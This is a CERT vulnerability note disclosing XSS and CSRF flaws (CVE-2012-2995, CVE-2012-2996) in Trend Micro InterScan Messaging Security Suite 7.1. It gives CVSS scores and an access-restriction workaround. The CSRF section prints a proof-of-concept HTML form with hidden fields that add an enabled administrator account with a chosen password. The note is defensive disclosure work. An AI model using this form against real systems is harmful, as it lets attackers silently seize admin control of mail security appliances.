search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Vulnerability Note VU#471364

Original Release Date: 2012-09-13 | Last Revised: 2014-08-15


Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.


Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS

Non-persistent/Reflected XSS

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<form action="hxxps://" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />


An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.


We are currently unaware of a practical solution to this problem. Please consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.

Vendor Information


Trend Micro Affected

Notified:  August 10, 2012 Updated: September 12, 2012



Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

CVSS Metrics

Group Score Vector
Base 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal 5.5 E:POC/RL:U/RC:UC
Environmental 1.4 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND



Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

CVE IDs: CVE-2012-2995, CVE-2012-2996
Date Public: 2012-09-13
Date First Published: 2012-09-13
Date Last Updated: 2014-08-15 02:53 UTC
Document Revision: 18

Sponsored by CISA.